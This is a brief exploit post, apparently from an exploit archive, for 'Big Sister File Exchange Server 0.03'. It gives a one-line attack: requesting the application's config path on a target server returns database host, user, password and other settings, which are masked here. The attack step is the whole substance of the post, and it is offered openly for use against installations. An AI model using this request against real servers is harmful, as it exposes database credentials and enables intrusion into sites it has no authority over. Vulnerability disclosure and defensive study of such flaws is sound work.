< ------------------- header data start ------------------- >

#############################################################

# Application Name : Big Sister File Exchange Server 0.03

# Vulnerable Type : Arbitrary Database Infos Disclosure Vulnerability

# Infection : SQL Info Get...

# author : Septemb0x

# Script Down.& WebSite : http://sourceforge.net/projects/bigsifes/files/bigsifes/bigsifes-0.03.tgz

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

EXPLOIT :
http://[target]/[path]/config

GET TO;

dbhost=*******
dbuser=*******
dbpassword=*******
db=*******
documentroot=*******
registermail=*******
fileowner=*******

< -- bug code end of -- >